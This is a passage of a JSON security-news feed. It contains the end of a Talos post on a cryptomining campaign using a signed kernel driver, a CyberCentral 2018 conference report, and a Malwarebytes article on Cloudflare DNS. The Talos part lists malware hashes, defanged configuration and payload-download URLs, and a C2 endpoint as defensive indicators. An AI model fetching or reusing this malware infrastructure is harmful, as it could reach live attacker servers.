mode driver deployed in order to provide the complete infrastructure for the final payload, ranging from downloading the payload, reloading the malware configuration, as well as hiding and protecting the malicious modules from detection and removal. \n \nUsing a kernel mode driver is quite an unusual method for everyday malware campaigns, and requires at least a moderate technical knowledge on the part of the developers. The fact that the certificate used to sign the driver has an expired validity period, points to a possible intention of attackers to target geographic regions with a smaller proportion of the latest operating systems in the user base. \n \nAlthough this newly created cryptocurrency provided only limited returns, we can expect attackers to continue this trend in the future as more cryptocurrencies opt to allow mining with commodity desktop CPUs. \n \n\n\n### Coverage\n\n \nAdditional ways our customers can detect and block this threat are listed below. \n \n\n\n[](<https://1.bp.blogspot.com/-7SCmIdro4lw/Wt337hTmLiI/AAAAAAAAAIo/kqDhFY4-9qAoQmILrtOaYmRJaLoOdVnFACLcBGAs/s1600/image11.png>)\n\n \n \nAdvanced Malware Protection ([AMP](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/advanced-malware-protection&sa=D&ust=1524498497049000>)) is ideally suited to prevent the execution of the malware used by these threat actors. \n \n[CWS](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html&sa=D&ust=1524498497050000>) or[ WSA](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html&sa=D&ust=1524498497050000>) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \n[Email Security](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html&sa=D&ust=1524498497051000>) can block malicious emails sent by threat actors as part of their campaign. \n \nNetwork Security appliances such as[ ](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/firewalls/index.html&sa=D&ust=1524498497051000>)[NGFW](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/firewalls/index.html&sa=D&ust=1524498497052000>),[ ](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html&sa=D&ust=1524498497052000>)[NGIPS](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html&sa=D&ust=1524498497052000>), and[ ](<https://www.google.com/url?q=https://meraki.cisco.com/products/appliances&sa=D&ust=1524498497053000>)[Meraki MX](<https://www.google.com/url?q=https://meraki.cisco.com/products/appliances&sa=D&ust=1524498497053000>) can detect malicious activity associated with this threat. \n \n[AMP Threat Grid](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html&sa=D&ust=1524498497054000>) helps identify malicious binaries and build protection into all Cisco Security products. \n \n[Umbrella](<https://www.google.com/url?q=https://umbrella.cisco.com/&sa=D&ust=1524498497054000>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \nOpen Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.google.com/url?q=https://www.snort.org/products&sa=D&ust=1524498497055000>). \n \n\n\n### \n\n \n\n\n### IOCs\n\n \n\n\n#### Drivers\n\n \nd90ebf52ad16db60949af988c24a9aaf59994836998ddefb7eadb7b26cecf05c \n7dc5f6e0296213b95ac6bbf07812987f681e933de8c41fef43789d01a410e320 \nb2c497662c1fd004ad97173c95740ee89490dfe34cfae5c898461c108f6539cd \n87cdfc90ded55e83948e54ef2d20d78c1ef9d78a8a018c01aa80645fb7eb33ce \n838d62a9d978ca5dfbeef50636df6a05ac0377d245b3b9df931a2c2ddb8b9f28 \nea828b2250825e3530fa6a889b71aba5fe52bf1aa70cc240b5208fcd57490912 \n9c45bf161947c7dd7aead23c2de4e806a7e260bd61be99eda0ce674f831c414f \n6e9bc99005f7070acd58c873caddcd3fe256bd281f1e7dfb81fbcc4fcdafeddd \n19f42d8d1a2b57058f38d62246cb1b7128c43060d2c504d2a52f4ef62e63e1fe \na7c7f4b1751857c4e44b4a81666e10e73808294b9bdbfd9be18865b4612a370e \nf514319a8677fa29f0b2179d91fd7b190402de5bc87aca48b1ed2e96ab56905a \nd81c1d5f21e66f8fc49123dffb11d23c3d7531a922a7e060dc9455c92cdb8008 \nd3c30f7339374d96c99df11cb4bbd944f11593a416cb5a67188c0f87e30d6054 \n0e92454df699cea60df2ca1620ced9ca8e0bec8c6f4424df62b1b8c5e4b2167f \ncb48cefc8cdd4856f800b80ab7bb2dd98a5f3e2e83ec11d89f138ef259c324db \nd2323e3e850733b32cc72d6f9527181af1e1f13d24fa2bc4e2c2cc14bf148d70 \n962c723b17d35b83ec52801be82bce4c2ce936c2bc57c82112958b0d32c9db97 \nab0b53890ecc5c85f050b18564b953895daec8db75652100639da49a71e538ff \n708db4511cb78329caaa50b69ed07ec28208a3bd05aea25f47fe5fe0ae5e2592 \nc81d032fba5e178b7a264b301aec4399375067fa22ca85a0ab3eef4d06f3cdb0 \nfff7ba34752cf2ed8e934b826235ea66a701b6a79f15c4e88e692c91e12941fa \n934b7cce2c370b5bfcd462e33e55aa45cc25c588361fdb32e7a2670a3acef0e2 \nec37f13a40eac500eece7904885ace72ca66fa015293159bba2a33992d2d2a6e \n28ed8326bb1c4099e2bd88973e73c4464a46bb35952b4490f7be165491b40da6 \n0d8969db5bda666b92de13bc0033344ee489c340e02c2667e6fd5a924d52d20c \n \n\n\n#### Droppers (CalculatorXXXX.exe)\n\n \n66908c744a11db8d72ad0b95c41de9fa13cc996c17884a3b39e8fdcd4fee20ee \nf98f23c223a498c5687af84cd6c17b853a0abb0458d5606e5b62a3e75b1dbab6 \n019426698cb1cc733024c38d0d09ff5dcac1ad9cf81d26c092a278f72f131e59 \n04de0bcd0f61a38f7ffd59c8fb369616a1648e65ea717994dbbef7db1bb6df1d \n051825abb810183939cc00055eb841ba4c319c46fbacf30cc2b6ac60fb3305f8 \n0ace52b5d1847f2fea1f6db75e69215176017d98d113fd7860eab89607e6c955 \n1648ee9890f17f19b45c751f3bcf898267c7b8a3bb5188138f65b1857e8c9985 \n1f634c71be6f0615facd7364ed2edb50b388d75ff26e486addafc40ee0f95d89 \n3163a93a00d5e6c6de4d2d57a4badab0f33c5f27016f3685e5cfd83d0de759dd \n32e2f73faf2f8acb68b373ae61cdcb0a72d168be85102e520690bfd64840bb59 \n4eeb22623b78909c1b6179ce47d1c5130b88d381ba86dc51886b78c03476c2dd \n551fd86f19d1980696622dd4cf2535573b8a66f3e4fb0155f8dac919f1f50488 \n6bde69fb7d35fac40d6e108ce610401eb08c5fc69a481d4cb03483ee3cd9705e \n76d419d9a9d047ef19058496bb64c8caf2456a8d76f45a0523b7a5fdce21dd40 \n7e41a9427e27e980578e59698d4f7f88c649e355eb26bbd549973f1ca7355828 \n806742372cb0f4fc8a64b15b186e78cea1459f970b5620e2bcfdcd73db2d6fa6 \na94a8cbe146fb4f66ba907c1d40fdda916c8ecd0fa0d7114814a25565ac96aa2 \nd6fce2bd96498333feb43404a34ce826ee915fa30785a18ec3c7b15b6ae924a9 \ndb25a7265029188d4d39cb5654c9ca558302fb0ddb3de081e53300122c8a3c2c \ne2da5b82da75be16640774128af067ac608515bd7a3c32082ae89c3967048c20 \ne4c0c999af4abf99f6afa21c991357aff3c1eae1f424df3a2c307bb578fdbbf0 \nea6226fcb7adf1ad57f2e64c99d735e7cb54063b5bed970c5fd75a9e55f7bf1a \n \n\n\n#### Dropper Toolkit\n\n \n\n\n8185b8a3629dc1fb5090a12f0418ce91ee1908117487e3316f96ba17fa64a5db \n \n\n\n#### Modified Bitvote cpuminer\n\n \n\n\n87c27f08d1eaa1ad2addd6af381829c037d55186ceded7249d5af0a62e464032 \n \n\n\n#### Domains for configuration downloads\n\n \n\n\nhxxp://image.bcn2018.com/ \nhxxp://image.cheap2019.com/ \nhxxp://image.docu2018.com/ \nhxxp://image.gxb2018.com/ \nhxxp://image.japchn2018.com/ \nhxxp://image.pply2018.com/ \nhxxp://image.succe2018.com/ \nhxxp://image.yyxp2019.com/ \nhxxp://img.rmb777.me/ \n \n\n\n#### Hardcoded Urls for downloads of payloads and newer driver versions (may be superseded by the new configuration downloaded from configurations sites) \n\n \nhxxp://1022k.blogspot.com/2018/02/1022s.html \nhxxp://7mlftakc3qt48.livejournal.com/721.html \nhxxp://bbx2018.blogspot.com/2018/02/1026i.html \nhxxp://bct2018.blogspot.com/2018/02/1027i.html \nhxxp://btv2018.blogspot.com/2018/02/blog-post.html \nhxxp://check2018.livejournal.com/517.html \nhxxp://earthjor.livejournal.com/721.html \nhxxp://gba2019.livejournal.com/767.html \nhxxp://hbrhzuds1199.livejournal.com/799.html \nhxxp://hrb2019.livejournal.com/620.html \nhxxp://iphone2019.livejournal.com/635.html \nhxxp://kawakaw.livejournal.com/594.html \nhxxp://livegoogle.livejournal.com/546.html \nhxxp://lovejoin2019.blogspot.com/2018/02/1031.html \nhxxp://myinsterschool.blogspot.com/2018/02/1032.html \nhxxp://myqnewworld.blogspot.com/2018/02/1030.html \nhxxp://nha2019.livejournal.com/749.html \nhxxp://talkto2018.livejournal.com/518.html \nhxxp://tpshadow66655.livejournal.com/545.html \nhxxp://xabx2019.livejournal.com/559.html \nhxxp://xmr1022.livejournal.com/763.html \nhxxp://xmr1022x.livejournal.com/656.html \nhxxp://xmr2019.blogspot.com/2018/01/1021s.html \nhxxp://xmr2019.blogspot.com/2018/01/my-sister.html \nhxxp://xmr2019.livejournal.com/1165.html \nhxxp://xmr2019.livejournal.com/748.html \n \n\n\n#### URLs for C2\n\n \n\n\nhxxp://down.rmb666.me/dr.php \n \n\n\n[](<http://feeds.feedburner.com/~ff/feedburner/Talos?a=5RBkUbicJr4:JpZ4ckZod20:yIl2AUoC8zA>)\n\n", "reporter": "noreply@blogger.com (Vanja Svajcer)", "published": "2018-04-23T09:44:00", "type": "talosblog", "title": "Cryptomining Campaign Returns Coal and Not Diamond", "enchantments": {}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-04-24T14:39:11", "id": "TALOSBLOG:66A9904BDE99019760E581153C5742BF", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/5RBkUbicJr4/cryptomining-campaign-returns-coal-not-diamond.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "avleonov": [{"lastseen": "2018-04-23T09:02:09", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Almost whole last week I spent in Prague at [CyberCentral](<https://cybercentral.eu/>) conference. It was a pretty unique experience for me. I was for the first time at the International conference as a speaker. And not only I presented my report there, but lead the round table on Vulnerability Management and participated in a panel session.\n\n\n\nFrom my point of view, everything was pretty good. I successfully closed my gestalt on public speaking in English. I definitely can do it. \n\nThe event was hold in Lucerna passage right in a center of Prague. Beautiful building in Art Nouveau style with famous ironic \"Statue of King Wenceslas Riding an Upside-Down Dead Horse\". \n\n\n\nEven to speak in this building was a great honor. In my opinion the place was chosen ideally. It is beautiful and really good located. Lots of good hotels, restaurants and all main tourist attractions were in nearby. It was easy to go for a walk in a spare time. Some photos you can see at my Facebook page [[1](<https://www.facebook.com/avleonov/posts/10214853806074979>),[2](<https://www.facebook.com/avleonov/posts/10214854128083029>)] .\n\n### Day 0\n\nFirst pre-conference day I spent at the Application Security training by [Milan Pikula](<https://www.linkedin.com/in/pikula/>), Security Analyst Lead at [SK-CERT](<http://www.nbusr.sk/en/cyber-security/sk-csirt/index.html>). He demonstrated how to exploit some basic web application vulnerabilities and use methods of binary analysis. It was possible to give it a try: all vulnerable applications were available for the audience.\n\n\n\nI need to say that the Small Lucerna cinema Hall is very comfortable for such trainings. In every chair there was a built-in small table for the laptop and a power socket.\n\nAt the evening we had a great dinner for the speakers at the [V\u00fdtopna Restaurant](<https://vytopna.cz>). Great feature of this restaurant is the functional railroad that goes right on the tables and the small trains serve drinks to the customers.  Food was also pretty good.\n\n\n\nCyberCentral is not a very big conference, comparing to the main Russian events for security practitioners: [PHDays](<https://avleonov.com/2017/05/29/phdays-vii-to-vulnerability-database-and-beyond/>) and [ZeroNights](<https://avleonov.com/2017/11/19/zeronights-2017-back-to-the-cyber-80s/>). At the same time it is an advantage. It's much better for networking. Everyone in sight, everyone is available for a talk.\n\nThe important reason to visit European information security events is that you can meet there people who do not attend Russian international conferences. Moscow is a little bit far away for them and it's necessary to get visa. It's much easier to meet in one of the European countries. By the way, despite the fact that the conference was held in the Czech Republic, most of the attendees were from neighboring Slovakia. There were also many people from Germany, Great Britain and the Balkan countries. And practically from all other corners of Europe.\n\n### Day 1\n\nAt the first day of the conference I can mention great presentation of [Marco Ermini](<https://www.xing.com/profile/Marco_Ermini>), \nSenior Security Architect Hosts & Networks at Telefonica O2. He was talking how security risks and threats are connected with merger and acquisition activities. I especially liked the second part of his presentation. It was OSINT tools. I had some experience in Competitive Analysis and used similar techniques for getting information about different organisations from the publicly available data.\n\nAt the same day I lead the round table on Vulnerability Management. Networking was pretty fun. 5 people participated. We discussed Tenable and other VM vendors, who drag everything into their clouds. ^_^ We also talked about compliance scanning, GDPR and about life in our countries.\n\n\n\n### Day 2\n\nThe second day was THE day for me. First of all, I presented my report \"Enterprise Vulnerability Management: fancy marketing brochures and the real-life troubles\".\n\n\n\n\n\nYou can see slides at Slideshare:\n\nI was preparing this presentation since October 2017 and partly shown it at [ISACA Moscow meetup](<https://avleonov.com/2017/10/23/isaca-moscow-vulnerability-management-meetup-2017/>). Of course, for CyberCenter I updated it a lot: added [research on CWE](<https://avleonov.com/2017/10/21/cwes-in-nvd-cve-feed-analysis-and-complaints/>), [Nessus exploits](<https://avleonov.com/2017/11/02/exploitability-attributes-of-nessus-plugins-good-bad-and-vulners/>), [IDC](<https://avleonov.com/2018/03/16/my-short-review-of-idc-worldwide-security-and-vulnerability-management-market-shares-2016/>) and [Forrester](<https://avleonov.com/2018/03/20/my-short-review-of-the-forrester-wave-vulnerability-risk-management-q1-2018/>) marketing reports, the latest problems with [Nessus](<https://avleonov.com/2017/12/13/new-nessus-7-professional-and-the-end-of-cost-effective-vulnerability-management-as-we-knew-it/>) and [OpenVAS](<https://avleonov.com/2018/03/28/openvas-knowledge-base-become-smaller/>). I also spoke a little bit about [my vulnerability scanner Vulchain](<https://avleonov.com/2018/04/06/vulchain-scan-workflow-and-search-queries/>) and added wonderful examples of patching problems related to the latest Specter and Meltdown vulnerabilities.\n\nFinally, I've got this presentation plan:\n\n 1. Typical VM Solution\n 2. Inconvenient Questions\n 3. What actually should we scan? \n * [Perimeter](<https://avleonov.com/2017/11/28/vulnerability-management-for-network-perimeter/>)\n * Office\n * Business critical / Production\n 4. VM Analyst's Heaven and Hell\n 5. Vulnerability Management Market\n 6. Outrageously expensive solutions\n 7. Limited license = Limited IT Visibility\n 8. [The end of cost-effective VM (Nessus 7)](<https://avleonov.com/2017/12/13/new-nessus-7-professional-and-the-end-of-cost-effective-vulnerability-management-as-we-knew-it/>)\n 9. [OpenVAS \u201cAttic Cleanup\u201d](<https://avleonov.com/2018/03/28/openvas-knowledge-base-become-smaller/>)\n 10. [What about your own scanner?](<https://avleonov.com/2018/04/06/vulchain-scan-workflow-and-search-queries/>)\n 11. All Vulnerability Scanners are the same? \n * [CVE-based comparison](<https://avleonov.com/2016/11/27/fast-comparison-of-nessus-and-openvas-knowledge-bases/>)\n 12. Reports: problem of prioritization \n * [Common Weakness Enumeration (CWE)](<https://avleonov.com/2017/10/21/cwes-in-nvd-cve-feed-analysis-and-complaints/>)\n * [Exploitability flags](<https://avleonov.com/2017/11/02/exploitability-attributes-of-nessus-plugins-good-bad-and-vulners/>)\n 13. Dynamic reports\n 14. Why *they* don\u2019t patch vulnerabilities \n * It\u2019s great when you can update OS automatically, but\u2026\n * Something can break after update\n * Update can make situation even worse (Spectre and Meltdown)\n * The Neverending story of 3d party software patching\n * Fifty Shades of Legacy\n * Some systems are just difficult to update\n\nAnd made the following conclusions:\n\n 1. There is no magic in Vulnerability Management\n 2. Vulnerability scanners are awesome. Trust them, but not too much.\n 3. Homegrown automation is still necessary: \n * Update scan targets (Wiki, DNS, WAF/AntiDDoS, AD, Monitorings\u2026) and manage regular scan tasks\n * Get critical exploitable vulnerabilities from scan results\n * Inform responsible person / make tasks\n * Get statistics and visualize VM process\n\nIn the Q&A section, we talked very nicely about problems of detecting vulnerabilities in self-assembled software packages and about backported patches. Also there were interesting questions about [Vulchain](<https://avleonov.com/2018/04/06/vulchain-scan-workflow-and-search-queries/>) and the detection methods that it currently uses. ^ _ ^\n\nIn the same technical stream I liked 2 presentations:\n\n * First one, \"Regulations vs. actual security. The bottom line.\" by [Viktor Larionov](<https://www.linkedin.com/in/vlarionov/>), Director Of Operations at Nordicore Operations Ltd. He was talking about regulators who always check the documents and not the servers. I am working on actual security and naturally I would like to see more server checks during such audits.\n * The second one is \"Building Great SOC & CSIRT from Open-source Components\" by [Milan Pikula](<https://www.linkedin.com/in/pikula/>), Security Analyst Lead at [SK-CERT](<http://www.nbusr.sk/en/cyber-security/sk-csirt/index.html>). It was especially interesting what they use for Vulnerability Management. For example, I learned about [Taranis](<https://taranis.ncsc.nl/>) project. Here is a slide with the main SOC components: \n\n\nThen I was participating in \"International Panel on Worldwide Trends\". It was the last talk of the event.\n\n\n\nThe plenary session also went well:\n\n * We talked about the trends. I said that nothing fundamentally new is happening. The waste majority of cases that we all have seen recently happened because people do not patch their systems on perimeter (Equifax and Apache Struts), in internal network (Windows, [WannaCry](<https://avleonov.com/2017/05/13/wannacry-about-vulnerability-management/>), [Petya](<https://avleonov.com/2017/06/30/petya-the-great-and-why-they-dont-patch-vulnerabilities/>), etc.) or do not make minimal hardening (Cisco Smart Install). And as long as people don't pay much attention to Vulnerability and Patch Management there will be lots of such massive attacks.\n * Then we talked about awareness. I said that training of the employees is wonderful, but we shouldn't forget to make effective minimization of privileges as our first priority.\n * The social problem of cybercrime also was discussed. Nothing new: whitehats and blackhats are grown from the same children. We should start working with them earlier: show how they can do what they really like to do while staying on the light side; how to earn money without risk of getting in jail.\n\nIt was very intense week. Lots of new connections and interesting talks. Big thanks to the organizers, especially to [Alexander Nevski](<https://www.linkedin.com/in/alexander-nevski/>), Cyber Security Program Director at EBCG, and all participants! It was awesome. =)\n\n", "reporter": "Alexander Leonov", "published": "2018-04-22T12:23:50", "type": "avleonov", "title": "CyberCentral Summit 2018 in Prague", "enchantments": {}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-04-22T12:23:50", "id": "AVLEONOV:9D792E1EA613C0D66266ACAA86B9B957", "href": "http://feedproxy.google.com/~r/avleonov/~3/l76Pez8VykM/", "cvss": {"score": 0.0, "vector": "NONE"}}], "malwarebytes": [{"lastseen": "2018-04-23T10:31:47", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Are you looking for a free way to speed up your internet and gain some extra privacy in the process? Keep reading, because Cloudflare (the Web Performance & Security Company) is offering a free new DNS service. And it helped me improve the speed of my DNS lookups.\n\n### What is DNS?\n\nDNS is short for Domain Name System. It is an internet protocol that allows user systems to use domain names/URLs to identify a web server rather than inputting the actual IP address of the server. For example, the IP address for Malwarebytes.com is 104.72.35.176, but rather than typing that into your browser, you just type \u2018malwarebytes.com,\u2019 and your system reaches out to a \u2018DNS Server\u2019 which has a list of all domain names and their corresponding IP address, delivering that upon request to the user system. Unfortunately, if a popular DNS server is taken down or in some way disrupted, many users are unable to reach their favorite websites because, without the IP address of the web server, your system cannot find the site. When trying to explain the concept of DNS name resolution, I think that finding a phone number for a certain person is a good analogy. There are several ways to find a person\u2019s phone number and the same is true for resolving an IP address that belongs to a domain name.\n\n### Which DNS servers am I using now?\n\nIf you have to ask yourself that question, there\u2019s a big chance that you are using the DNS service provided by your internet provider. And while some of those are quite good, others are deplorable. Those that have looked into changing their DNS servers have probably ended up using [Google\u2019s public DNS](<https://developers.google.com/speed/public-dns/>), or if they were also interested in a web filter, they might have ended up using [Cisco\u2019s OpenDNS](<https://system.opendns.com>). IMHO those are the two most popular alternatives for the ones provided by ISPs around the globe, but many more are available.\n\n### Why would I change to Cloudflare\u2019s?\n\nWe are not saying you should, but their claims sound very promising. Even if the differences in speed and privacy are not directly noticeable, you may be convinced by these arguments:\n\n * Cloudflare\u2019s service is 5 times faster than the average ISP\u2019s ([8 milliseconds compared to 70](<https://www.tomsguide.com/us/cloudflare-dns-1.1.1.1-set-up,news-26964.html>)).\n * ISPs do not always use strong encryption on their DNS or support [DNSSEC](<https://blog.malwarebytes.com/security-world/2017/02/dnssec-why-do-we-need-it/>), which makes their DNS queries vulnerable to data breaches and exposes users to threats like man-in-the-middle attacks.\n * Many companies collect data from their DNS customers to use for commercial purposes. Cloudflare promises not to mine any user data. Logs are kept for 24 hours for debugging purposes, then they are purged.\n * [Query name minimization](<https://blog.erratasec.com/2017/08/query-name-minimization.html#.WtimxR6geUk>) diminishes privacy leakage by only sending minimal query names to authoritative DNS servers.\n\nThat last one may need some explanation. The less information the DNS servers send to each other to resolve your DNS query, the smaller is the amount of data that would be revealed in case of a leak or breach. This is why servers that use this method only send each other the minimum of information that the receiving server needs.\n\n### How to change your DNS servers?\n\nThe method to change your DNS servers depends very much on the level at which you want to change them and on the operating system you are using. If you have tried the DNS service and decide that you like it, it might be advisable to change the DNS servers at the router level, so you don\u2019t have to do it for each device separately. To do this successfully your computers and devices need to be set up for DHCP, or they will not even look at the router for DNS information. [Lifewire published a guide for the most common routers](<https://www.lifewire.com/how-to-change-dns-servers-on-most-popular-routers-2617995>) that might prove to be handy. For mobile devices be aware that they will change DNS servers when they are no longer using your router.\n\nAt the device level, the OS is the deciding factor on how you can change the DNS servers.\n\n * [How to Change DNS Servers in Windows](<https://www.lifewire.com/how-to-change-dns-servers-in-windows-2626242>)\n * [How to Change Your Mac's DNS Settings](<https://www.lifewire.com/network-preference-pane-change-macs-dns-settings-2260394>)\n * [Change Your DNS Settings on iPhone, iPod Touch, and iPad](<https://techinch.com/blog/change-your-dns-settings-on-iphone-ipod-touch-and-ipad>)\n * [How to Change the DNS for an Android](<http://smallbusiness.chron.com/change-dns-android-28423.html>)\n * [Change DNS settings on Linux](<https://support.rackspace.com/how-to/changing-dns-settings-on-linux/>)\n\n### Testing the difference\n\nTo check whether it would be a possible speed improvement for you to switch DNS service you can use a free toll called NameBench.\n\n_Background information: the NameBench tool is offered by Google and was launched around the same time that Google started offering their free DNS service._\n\nNameBench can be downloaded from [Google Code](<https://code.google.com/archive/p/namebench/downloads>) \u2013 there are suitable versions for several operating systems - and after installation, you can specify the DNS servers that you would like it to test.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/04/NameBench.png> \"\" )\n\n * Google Public DNS: 8.8.8.8\n * Cloudflare DNS: 1.1.1.1\n * OpenDNS : 208.67.222.123\n\nIt does help to set \u201cYour location,\u201d but my laptop travels a lot, so I skipped that. Then \u201cStart Benchmark\u201d and be patient for a while, because it may take a few before the application is done testing (it took almost half an hour on my laptop). The results will have a layout similar to this one:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/04/NBReport.png> \"\" )\n\n_While your results may be very different from mine, you can tell that it can definitely pay off to do this test if you are looking for a speed improvement._\n\nSo, a speed improvement of 13.5 % and a promise of added privacy. What am I going to do? Well, at least I\u2019ll try it for a while to see if it makes a real difference. And note that I already was using an alternative for the DNS service of my provider, which was terrible, to begin with.\n\n### Summary\n\nFor most internet users it is worth looking into which DNS service works best for them. Be it for speed improvement or some of the added benefits that some of these DNS services have to offer, like additional privacy or parental controls. But most will keep on using the ones provided by their ISP provider because they just can\u2019t be bothered or find it too complicated to change the settings. We do our best to encourage our readers to make informed choices and decide for themselves who they want to trust with the data that can be derived from DNS lookups.\n\nBe safe!\n\nThe post [Cloudflare\u2019s new DNS service](<https://blog.malwarebytes.com/101/how-tos/2018/04/cloudflares-new-dns-service/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "reporter": "Pieter Arntz", "published": "2018-04-20T16:00:00", "type": "malwarebytes", "title": "Cloudflare\u2019s new DNS service", "enchantments": {}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-04-20T16:00:00", "id": "MALWAREBYTES:D7318655D02357D3F77BA12E17E39068", "href": "https://blog.malwarebytes.com/101/how-tos/2018/04/cloudflares-new-dns-service/", "cvss": {"score": 0.0, "vector": "NONE"}}]}}